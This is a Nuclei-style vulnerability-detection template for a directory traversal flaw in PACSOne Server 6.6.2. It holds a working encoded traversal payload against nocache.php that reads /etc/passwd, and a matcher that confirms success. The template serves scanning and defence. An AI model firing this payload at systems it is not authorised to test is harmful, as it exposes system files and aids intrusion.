id: pacsone-server-6-6-2-lfi

info:
  name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal
  author: 0x_Akoko
  severity: high
  reference: https://cxsecurity.com/issue/WLB-2018010303
  tags: pacsone,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
